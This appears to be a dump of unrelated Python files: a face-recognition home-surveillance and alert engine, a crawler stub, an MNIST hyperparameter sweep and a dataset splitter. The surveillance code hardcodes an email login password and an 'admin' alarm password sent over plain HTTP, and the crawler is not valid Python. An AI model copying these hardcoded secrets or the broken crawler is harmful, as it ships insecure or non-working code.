camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
start = time.time() # Used to go back to motion detection state of 30s of not finding a face
camera.processing_frame = frame
###################################################################################################################################################################
#<#####################################> MOTION DETECTION OBJECT SEGMENTAION FOLLOWED BY FACE DETECTION AND RECOGNITION <#####################################>
####################################################################################################################################################################
elif camera.cameraFunction == "segment_detect_recognise":
# This approach uses background subtraction to segement a region of
# interest that is likely to contain a person. The region is cropped from
# the frame and face detection is performed on a much smaller image. This
# improves proccessing performance but is highly dependent upon the accuracy of
# the background model generated by the MotionDetector object.
training_blocker = self.trainingEvent.wait()
camera.motion, peopleRects = camera.motionDetector.detect_movement(frame, get_rects = True)
if camera.motion == False:
camera.processing_frame = frame
logger.debug('////-- NO MOTION DETECTED --////')
continue
logger.debug('///// MOTION DETECTED /////')
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, peopleRects, False)
for x, y, w, h in peopleRects:
logger.debug('//// Proccessing People Segmented Areas ///')
bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
personimg = ImageUtils.crop(frame, bb, dlibRect = True)
personimg = cv2.flip(personimg, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
if self.drawing == True:
camera.processing_frame = ImageUtils.draw_boxes(frame, peopleRects, False)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
logger.info('/// Proccessing Detected faces ///')
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
with camera.peopleDictLock:
if camera.people.has_key(predictions['name']):
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
############################################################################################################################################################################
#<#####################################> MOTION DETECTION OBJECT SEGMENTAION FOLLOWED BY FACE DETECTION, RECOGNITION AND TRACKING <#####################################>
#############################################################################################################################################################################
elif camera.cameraFunction == "detect_recognise_track":
# This approach incorporates background subtraction to perform person tracking
# and is the most efficient out of the all proccesing funcions above. When
# a face is detected in a region a Tracker object it generated, and is updated
# every frame by comparing the last known region of the person, to new regions
# produced by the motionDetector object. Every update of the tracker a detected
# face is compared to the person's face of whom is being tracked to ensure the tracker
# is still tracking the correct person. This is acheived by comparing the prediction
# and the the l2 distance between their embeddings (128 measurements that represent the face).
# If a tracker does not overlap with any of the regions produced by the motionDetector object
# for some time the Tracker is deleted.
training_blocker = self.trainingEvent.wait() # Wait if classifier is being trained
logger.debug('//// detect_recognise_track 1 ////')
peopleFound = False
camera.motion, peopleRects = camera.motionDetector.detect_movement(frame, get_rects = True)
logger.debug('//// detect_recognise_track 2 /////')
if camera.motion == False:
camera.processing_frame = frame
logger.debug('///// NO MOTION DETECTED /////')
continue
if self.drawing == True:
camera.processing_frame = ImageUtils.draw_boxes(frame, peopleRects, False)
logger.debug('//// MOTION DETECTED //////')
for x, y, w, h in peopleRects:
peopleFound = True
person_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
personimg = ImageUtils.crop(frame, person_bb, dlibRect = True) # Crop regions of interest
personimg = cv2.flip(personimg, 1)
tracked = False
# Iterate through each tracker and compare there current psotiion
for i in xrange(len(camera.trackers) - 1, -1, -1):
if camera.trackers[i].overlap(person_bb):
logger.debug("=> Updating Tracker <=")
camera.trackers[i].update_tracker(person_bb)
# personimg = cv2.flip(personimg, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
logger.debug('////// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' /////')
if len(camera.faceBoxes) > 0:
logger.info("Found " + str(len(camera.faceBoxes)) + " faces.")
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
if predictions['confidence'] > self.confidenceThreshold:
predictedName = predictions['name']
else:
predictedName = "unknown"
# If only one face is detected
if len(camera.faceBoxes) == 1:
# if not the same person check to see if tracked person is unknown and update or change tracker accordingly
# l2Distance is between 0-4 Openface found that 0.99 was the average cutoff between the same and different faces
# the same face having a distance less than 0.99
if self.recogniser.getSquaredl2Distance(camera.trackers[i].person.rep ,predictions['rep']) > 0.99 and (camera.trackers[i].person.identity != predictedName):
alreadyBeenDetected = False
with camera.peopleDictLock:
for ID, person in camera.people.iteritems(): # iterate through all detected people in camera
# if the person has already been detected continue to track that person - use same person ID
if person.identity == predictedName or self.recogniser.getSquaredl2Distance(person.rep ,predictions['rep']) < 0.8:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictedName)
logger.info( "====> New Tracker for " +person.identity + " <===")
# Remove current tracker and create new one with the ID of the original person
del camera.trackers[i]
camera.trackers.append(Tracker(frame, person_bb, person,ID))
alreadyBeenDetected = True
break
if not alreadyBeenDetected:
num = random.randrange(1, 1000, 1)
strID = "person" + datetime.now().strftime("%Y%m%d%H%M%S") + str(num) # Create a new person ID
# Is the new person detected with a low confidence? If yes, classify them as unknown
if predictions['confidence'] > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
#add person to detected people
with camera.peopleDictLock:
camera.people[strID] = person
logger.info( "=====> New Tracker for new person <====")
del camera.trackers[i]
camera.trackers.append(Tracker(frame, person_bb, person,strID))
# if it is the same person update confidence if it is higher and change prediction from unknown to identified person
# if the new detected face has a lower confidence and can be classified as unknown, when the person being tracked isn't unknown - change tracker
else:
logger.info( "====> update person name and confidence <==")
if camera.trackers[i].person.confidence < predictions['confidence']:
camera.trackers[i].person.confidence = predictions['confidence']
if camera.trackers[i].person.confidence > self.confidenceThreshold:
camera.trackers[i].person.identity = predictions['name']
# If more than one face is detected in the region compare faces to the people being tracked and update tracker accordingly
else:
logger.info( "==> More Than One Face Detected <==")
# if tracker is already tracking the identified face make an update
if self.recogniser.getSquaredl2Distance(camera.trackers[i].person.rep ,predictions['rep']) < 0.99 and camera.trackers[i].person.identity == predictions['name']:
if camera.trackers[i].person.confidence < predictions['confidence']:
camera.trackers[i].person.confidence = predictions['confidence']
if camera.trackers[i].person.confidence > self.confidenceThreshold:
camera.trackers[i].person.identity = predictions['name']
else:
# if tracker isn't tracking this face check the next tracker
break
camera.trackers[i].person.set_thumbnail(alignedFace)
camera.trackers[i].person.add_to_thumbnails(alignedFace)
camera.trackers[i].person.set_rep(predictions['rep'])
camera.trackers[i].person.set_time()
camera.trackers[i].reset_face_pinger()
with camera.peopleDictLock:
camera.people[camera.trackers[i].id] = camera.trackers[i].person
camera.trackers[i].reset_pinger()
tracked = True
break
# If the region is not being tracked
if not tracked:
# Look for faces in the cropped image of the region
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
alreadyBeenDetected = False
with camera.peopleDictLock:
for ID, person in camera.people.iteritems(): # iterate through all detected people in camera, to see if the person has already been detected
if person.identity == predictions['name'] or self.recogniser.getSquaredl2Distance(person.rep ,predictions['rep']) < 0.8:
if predictions['confidence'] > self.confidenceThreshold and person.confidence > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
logger.info( "==> New Tracker for " + person.identity + " <====")
camera.trackers.append(Tracker(frame, person_bb, person,ID))
alreadyBeenDetected = True
break
if not alreadyBeenDetected:
num = random.randrange(1, 1000, 1) # Create new person ID if they have not been detected
strID = "person" + datetime.now().strftime("%Y%m%d%H%M%S") + str(num)
if predictions['confidence'] > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
#add person to detected people
with camera.peopleDictLock:
camera.people[strID] = person
logger.info( "====> New Tracker for new person <=")
camera.trackers.append(Tracker(frame, person_bb, person,strID))
for i in xrange(len(camera.trackers) - 1, -1, -1): # starts with the most recently initiated tracker
if self.drawing == True:
bl = (camera.trackers[i].bb.left(), camera.trackers[i].bb.bottom()) # (x, y)
tr = (camera.trackers[i].bb.right(), camera.trackers[i].bb.top()) # (x+w,y+h)
cv2.rectangle(frame, bl, tr, color=(0, 255, 255), thickness=2)
cv2.putText(frame, camera.trackers[i].person.identity + " " + str(camera.trackers[i].person.confidence)+ "%", (camera.trackers[i].bb.left(), camera.trackers[i].bb.top() - 10),
cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.3,
color=(0, 255, 255), thickness=1)
camera.processing_frame = frame
# Used to check if tracker hasn't been updated
camera.trackers[i].ping()
camera.trackers[i].faceping()
# If the tracker hasn't been updated for more than 10 pings delete it
if camera.trackers[i].pings > 10:
del camera.trackers[i]
continue
elif camera.cameraFunction == "testing":
# Used for testing puposes
training_blocker = self.trainingEvent.wait()
# tempframe = frame
frame = cv2.flip(frame, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
logger.debug('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' //')
for face_bb in camera.faceBoxes:
result = ""
# used to reduce false positives from opencv haar cascade detector
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
with self.testingResultsLock:
self.detetectionsCount += 1
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
cv2.imwrite('testing/results/unconstrained/alignedDetections/60/'+ str( self.detetectionsCount) +'.png',alignedFace)
if predictions['name'] == 'brandon-joffe':
self.trueDetections += 1
self.confidence_sum += predictions['confidence']
result = str( self.detetectionsCount) + ', ' + predictions['name'] + ', ' + str(predictions['confidence'])+ ', ' + str(self.trueDetections) + ', ' + str(self.confidence_sum)
ImageUtils.writeToFile('testing/results/unconstrained/accuracy/results60.txt',result)
elif camera.cameraFunction == "face_capture":
# This will be used to capture faces for training in the surveillance environment
# not fully implmented - was mainly used for face capture during testing
training_blocker = self.trainingEvent.wait()
# tempframe = frame
frame = cv2.flip(frame, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
logger.debug('// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' ///')
for face_bb in camera.faceBoxes:
result = ""
# used to reduce false positives from opencv haar cascade detector
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
with self.testingResultsLock:
self.detetectionsCount += 1
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
# cv2.imwrite('testing/alignedFacesForTraining/surelda/surelda'+ str(self.detetectionsCount) +'.png',alignedFace)
cv2.imwrite('testing/alignedFacesForTesting/tracy/tracy-'+ str(self.detetectionsCount) +'.png',alignedFace)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
def alert_engine(self):
"""check alarm state -> check camera -> check event ->
either look for motion or look for detected faces -> take action"""
logger.debug('Alert engine starting')
while True:
with self.alertsLock:
for alert in self.alerts:
logger.debug('checking alert')
if alert.action_taken == False: # If action hasn't been taken for event
if alert.alarmState != 'All': # Check states
if alert.alarmState == self.alarmState:
logger.debug('checking alarm state')
alert.event_occurred = self.check_camera_events(alert)
else:
continue # Alarm not in correct state check next alert
else:
alert.event_occurred = self.check_camera_events(alert)
else:
if (time.time() - alert.eventTime) > 300: # Reinitialize event 5 min after event accured
logger.info( "reinitiallising alert: " + alert.id)
alert.reinitialise()
continue
time.sleep(2) # Put this thread to sleep - let websocket update alerts if need be (i.e delete or add)
def check_camera_events(self,alert):
"""Used to check state of cameras
to determine whether an event has occurred"""
if alert.camera != 'All': # Check cameras
logger.info( "alertTest" + alert.camera)
if alert.event == 'Recognition': #Check events
logger.info( "checkingalertconf "+ str(alert.confidence) + " : " + alert.person)
for person in self.cameras[int(alert.camera)].people.values():
logger.info( "checkingalertconf "+ str(alert.confidence )+ " : " + alert.person + " : " + person.identity)
if alert.person == person.identity: # Has person been detected
if alert.person == "unknown" and (100 - person.confidence) >= alert.confidence:
logger.info( "alertTest2" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
elif person.confidence >= alert.confidence:
logger.info( "alertTest3" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
return False # Person has not been detected check next alert
else:
logger.info( "alertTest4" + alert.camera)
if self.cameras[int(alert.camera)].motion == True: # Has motion been detected
logger.info( "alertTest5" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
else:
return False # Motion was not detected check next alert
else:
if alert.event == 'Recognition': # Check events
with self.camerasLock :
cameras = self.cameras
for camera in cameras: # Look through all cameras
for person in camera.people.values():
if alert.person == person.identity: # Has person been detected
if alert.person == "unknown" and (100 - person.confidence) >= alert.confidence:
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
elif person.confidence >= alert.confidence:
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
return False # Person has not been detected check next alert
else:
with self.camerasLock :
for camera in self.cameras: # Look through all cameras
if camera.motion == True: # Has motion been detected
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
return False # Motion was not detected check next camera
def take_action(self,alert):
"""Sends email alert and/or triggers the alarm"""
logger.info( "Taking action: ==" + alert.actions)
if alert.action_taken == False: # Only take action if alert hasn't accured - Alerts reinitialise every 5 min for now
alert.eventTime = time.time()
if alert.actions['email_alert'] == 'true':
logger.info( "email notification being sent")
self.send_email_notification_alert(alert)
if alert.actions['trigger_alarm'] == 'true':
logger.info( "triggering alarm1")
self.trigger_alarm()
logger.info( "alarm1 triggered")
alert.action_taken = True
def send_email_notification_alert(self,alert):
""" Code produced in this tutorial - http://naelshiab.com/tutorial-send-email-python/"""
fromaddr = "home.face.surveillance@gmail.com"
toaddr = alert.emailAddress
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "HOME SURVEILLANCE"
body = "NOTIFICATION ALERT:" + alert.alertString + ""
msg.attach(MIMEText(body, 'plain'))
filename = "image.png"
attachment = open("notification/image.png", "rb")
part = MIMEBase('application', 'octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(part)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, "facialrecognition")
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
def add_face(self,name,image, upload):
"""Adds face to directory used for training the classifier"""
if upload == False:
path = fileDir + "/aligned-images/"
else:
path = fileDir + "/training-images/"
num = 0
if not os.path.exists(path + name):
try:
logger.info( "Creating New Face Dircectory: " + name)
os.makedirs(path+name)
except OSError:
logger.info( OSError)
return False
pass
else:
num = len([nam for nam in os.listdir(path +name) if os.path.isfile(os.path.join(path+name, nam))])
logger.info( "Writing Image To Directory: " + name)
cv2.imwrite(path+name+"/"+ name + "_"+str(num) + ".png", image)
self.get_face_database_names()
return True
def get_face_database_names(self):
"""Gets all the names that were most recently
used to train the classifier"""
path = fileDir + "/aligned-images/"
self.peopleDB = []
for name in os.listdir(path):
if (name == 'cache.t7' or name == '.DS_Store' or name[0:7] == 'unknown'):
continue
self.peopleDB.append(name)
logger.info("Known faces in our db for: " + name + " ")
self.peopleDB.append('unknown')
def change_alarm_state(self):
"""Sends Raspberry PI a resquest to change the alarm state.
192.168.1.35 is the RPI's static IP address port 5000 is used
to access the flask application."""
r = requests.post('http://192.168.1.35:5000/change_state', data={"password": "admin"})
alarm_states = json.loads(r.text)
logger.info(alarm_states)
if alarm_states['state'] == 1:
self.alarmState = 'Armed'
else:
self.alarmState = 'Disarmed'
self.alarmTriggerd = alarm_states['triggered']
def trigger_alarm(self):
"""Sends Raspberry PI a resquest to change to trigger the alarm.
192.168.1.35 is the RPI's static IP address port 5000 is used
to access the flask application."""
r = requests.post('http://192.168.1.35:5000/trigger', data={"password": "admin"})
alarm_states = json.loads(r.text)
logger.info(alarm_states)
if alarm_states['state'] == 1:
self.alarmState = 'Armed'
else:
self.alarmState = 'Disarmed'
self.alarmTriggerd = alarm_states['triggered']
logger.info(self.alarmTriggerd )
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
class Person(object):
"""Person object simply holds all the
person's information for other processes
"""
person_count = 0
def __init__(self,rep,confidence = 0, face = None, name = "unknown"):
if "unknown" not in name: # Used to include unknown-N from Database
self.identity = name
else:
self.identity = "unknown"
self.count = Person.person_count
self.confidence = confidence
self.thumbnails = []
self.face = face
self.rep = rep # Face representation
if face is not None:
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnail = jpeg.tostring()
self.thumbnails.append(self.thumbnail)
Person.person_count += 1
now = datetime.now() + timedelta(hours=2)
self.time = now.strftime("%A %d %B %Y %I:%M:%S%p")
self.istracked = False
def set_rep(self, rep):
self.rep = rep
def set_identity(self, identity):
self.identity = identity
def set_time(self): # Update time when person was detected
now = datetime.now() + timedelta(hours=2)
self.time = now.strftime("%A %d %B %Y %I:%M:%S%p")
def set_thumbnail(self, face):
self.face = face
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnail = jpeg.tostring()
def add_to_thumbnails(self, face):
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnails.append(jpeg.tostring())
class Tracker:
"""Keeps track of person position"""
tracker_count = 0
def __init__(self, img, bb, person, id):
self.id = id
self.person = person
self.bb = bb
self.pings = 0
self.facepings = 0
def reset_pinger(self):
self.pings = 0
def reset_face_pinger(self):
self.facepings = 0
def update_tracker(self,bb):
self.bb = bb
def overlap(self, bb):
p = float(self.bb.intersect(bb).area()) / float(self.bb.area())
return p > 0.2
def ping(self):
self.pings += 1
def faceping(self):
self.facepings += 1
class Alert(object):
"""Holds all the alert details and is continually checked by
the alert monitoring thread"""
alert_count = 1
def __init__(self,alarmState,camera, event, person, actions, emailAddress, confidence):
logger.info( "alert_"+str(Alert.alert_count)+ " created")
if event == 'Motion':
self.alertString = "Motion detected in camera " + camera
else:
self.alertString = person + " was recognised in camera " + camera + " with a confidence greater than " + str(confidence)
self.id = "alert_" + str(Alert.alert_count)
self.event_occurred = False
self.action_taken = False
self.camera = camera
self.alarmState = alarmState
self.event = event
self.person = person
self.confidence = confidence
self.actions = actions
if emailAddress == None:
self.emailAddress = "bjjoffe@gmail.com"
else:
self.emailAddress = emailAddress
self.eventTime = 0
Alert.alert_count += 1
def reinitialise(self):
self.event_occurred = False
self.action_taken = False
def set_custom_alertmessage(self,message):
self.alertString = message
|
main.py
|
import HTMLParser from HTMLParser
import Thread from threading
import re
import request, robotparser from urllib
import URIUnderstand
import basicDownload
class Parse(HTMLParser):
def __init__(self, url, saveList = (), unsafeList = (), hasParsedList = {}):
self.saveList = saveList
self.hasParsedList = hasParsedList
self.unsafeList = unsafeList
self.baseURL = url
self.url = url
super(Parse, self).__init__()
self.getData = download(url)
def unsafe(self, url):
if !self.hasParsedList[url]:
self.unsafeList[self.unsafeList.length] = url
self.hasParsedList[url]
def share(self, url):
if !self.hasParsedList[url]:
self.saveList[self.saveList.length] = url
self.hasParsedList[url] = True
return True
return False
def create(self, link):
if self.share(link):
newThread = Thread(target = threadMethod, args = (link, self.saveList, self.hasParsedList))
newThread.daemon = True
newThread.start()
def handle_starttag(self, tag, attributes):
if tag == "a" || tag == "link":
self.create(attributes.href)
elif tag == "script" || tag == "img" || tag == "audio" || tag == "embed":
self.share(attributes.src)
elif tag == "iframe" || tag == "source":
self.create(attributes.src)
elif tag == "object":
self.create()
elif tag == "form":
self.unsafe(attributes.action)
def threadMethod(url, saveList, hasParsedList):
v = UnderstandURL(url)
if v.isOK():
p = robotparser.RobotFileParser()
p.set_url(v.catDomain + "/robots.txt")
p.read()
if p.can_fetch(USER_AGENT, url):
|
rw_mnist.py
|
from core.run import run
from core.task_schedule import wait_schedule, Task, available_devices
from multiprocessing import Process
import datetime
import argparse
if __name__ == "__main__":
now = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
tag = 'ablo_K'
if tag == 'ablo_K':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [64, 128, 256, 512]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='ablo', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_h=10, lr_l=0.3, wd_h=0., wd_l=0.,
mm_h=0.)
args.workspace_root = "workspace/runs/rw_mnist/ablo_K_{}/seed_{}_K_{}".format(
now, seed, K)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
elif tag == 'wdh':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [512]:
for wd_h in [3e-6, 1e-5, 3e-5, 1e-4, 3e-4]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='ablo', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_h=10, lr_l=0.3, wd_h=wd_h, wd_l=0.,
mm_h=0.)
args.workspace_root = "workspace/runs/rw_mnist/wdh_{}/seed_{}_K_{}_wdh_{}".format(
now, seed, K, wd_h)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
elif tag == 'wdl':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [512]:
for wd_l in [1e-3, 3e-3, 1e-2, 3e-2, 1e-1]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='ablo', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_h=10, lr_l=0.3, wd_h=0., wd_l=wd_l,
mm_h=0.)
args.workspace_root = "workspace/runs/rw_mnist/wdl_{}/seed_{}_K_{}_wdl_{}".format(
now, seed, K, wd_l)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
elif tag == 'wdboth':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [512]:
for wd_l, wd_h in [(1e-3, 3e-6), (1e-3, 1e-5),
(1e-3, 3e-5), (1e-3, 1e-4)]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='ablo', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_h=10, lr_l=0.3, wd_h=wd_h, wd_l=wd_l,
mm_h=0.)
args.workspace_root = "workspace/runs/rw_mnist/wdboth_{}/seed_{}_K_{}_wdl_{}_wdh_{}".format(now, seed, K, wd_l, wd_h)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
elif tag == 'rs_K':
tasks = []
for seed in [0, 33, 777, 1341, 25731]:
for K in [64, 128, 256, 512]:
args = argparse.Namespace(
T=5000, K=K, seed=seed, ho_algo='random_search', dataset='corrupted_mnist', width=28, x_dim=784,
loss='ReweightingMLP', theta_mlp_shape=[784, 256, 10],
m_tr=2000, m_val=200, m_te=1000, m_mval=200, batch_size=100, lr_l=0.3, wd_l=0.)
args.workspace_root = "workspace/runs/rw_mnist/rs_K_{}/seed_{}_K_{}".format(
now, seed, K)
p = Process(target=run, args=(args,))
tasks.append(Task(p, 1))
wait_schedule(tasks, devices=available_devices() * 3)
|
dataset_formator.py
|
#!/bin/python
# Begin license text.
#
# Copyright 2021 Ondřej Zobal
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# End license text.
import os
import sys
import pathlib
import time
import threading
from shutil import copyfile
# ADJUSTABLE VARIABLES.
# Change the following group of variables to alter the behavior of the script.
# The categories into wich the dataset will be divided.
categories = [
'training',
'validation',
'finetuning',
]
# Ratio to split values between categories.
ratio = [
0.6,
0.2,
0.2,
]
# When true 'class_duplicate_amount' or 'class_exclude_amount' will be replaced
# with automatically calculated value if set to 0.
calculate_threshold_automatically = False
# Zero means don't duplicate, if 'calculate_threshold_automatically' is False.
class_duplicate_amount = 0
# Zero means don"t exclude, if 'calculate_threshold_automatically' is False.
class_exclude_amount = 0
# Path to the source directory.
source = None
# Path to the directory where the formated dataset will be created.
destination = None
# If true will use symlink, otherwise copying will be employed.
do_symlink = True
# NONADJUSTABLE VARIABLES.
# These variables will be set by the program.
# Will be filled with the class names.
source_dirs = []
# A table, will contain lists with files.
source_files = []
# List of indexes of classes that have to be overfitted.
sub_avg = []
# List of indexes of classes that have to be excluded.
sub_acc = []
# List of amounts of will that will need to be copied
amounts = []
# Progress of creating classes.
progress_class = 0
# Progress of creating files.
progress_file = 0
# Bollean indicating the thread should exit.
thread_stop = False
# May activate some debug features.
DEBUG = False
def banner():
print('''\
____
(| \
| | __, _|_ __, , _ _|_
_| |/ | | / | / \_|/ |
(/\___/ \_/|_/|_/\_/|_/ \/ |__/|_/
______ by Ondřej Zobal
(_) |
_|_ __ ,_ _ _ _ __, _|_ __ ,_
/ | |/ \_/ | / |/ |/ | / | | / \_/ |
(_/ \__/ |_/ | | |_/\_/|_/|_/\__/ |_/
''')
# The map translating the single char arguments into full string arguments.
def log(message, level='info', start=' ', end='\n', hide_box=False):
symbol = {
'info': '*',
'warning': 'W',
'error': '!',
}
box = f'[{symbol.get(level)}] ' if not hide_box else ''
nl = '\n'
print(
f'{nl if level == "error" else ""}{start}{box}{message}',
end=end)
# Exits the program prematurely and prints an error message.
def stop(msg='AN ISSUE'):
global thread_stop
log(f'THE PROGRAM IS EXITTING DUE TO: {msg}', 'error')
thread_stop = True
exit()
# Print a help text.
def arg_help(next_arg):
log('''You can use these flags:
-h\tDisplays this message.
-e\tMinimum amount of samples, before the dataset will be excluded.
-D\tMinimum amount of samples, before the dataset will be duplicated.
-S\tFlips calculate_thresholds_automatically. If true exclusion and
duplicating amounts will be calculated if they have been set to 0.
-r\tThe ratios between the categories separated by commas. (Ex. 0.6,0.4)
-c\tThe names of categories separated by commas. (Ex. train,validation)
-s\tThe directory of the source.
-d\tThe directory of the destination.
-S\tFlips do_symlink variable. If true links will be used instead of copying.
''')
exit()
return False
# Sets the ratio
def arg_ratio(next_arg):
global ratio
string_list = next_arg.split(',')
ratio = []
for x in string_list:
ratio.append(float(x))
# If the sum of all the numbers is grater than one
if sum(ratio) > 1:
stop('Sum of ratio is greater than 1!')
return True
# Setts the source directory
def arg_source(next_arg):
global source
source = next_arg
return True
# Setts the destination directory
def arg_destination(next_arg):
global destination
destination = pathlib.Path(next_arg)
return True
# Flips value in 'do_symlink'.
def arg_symlink(next_arg):
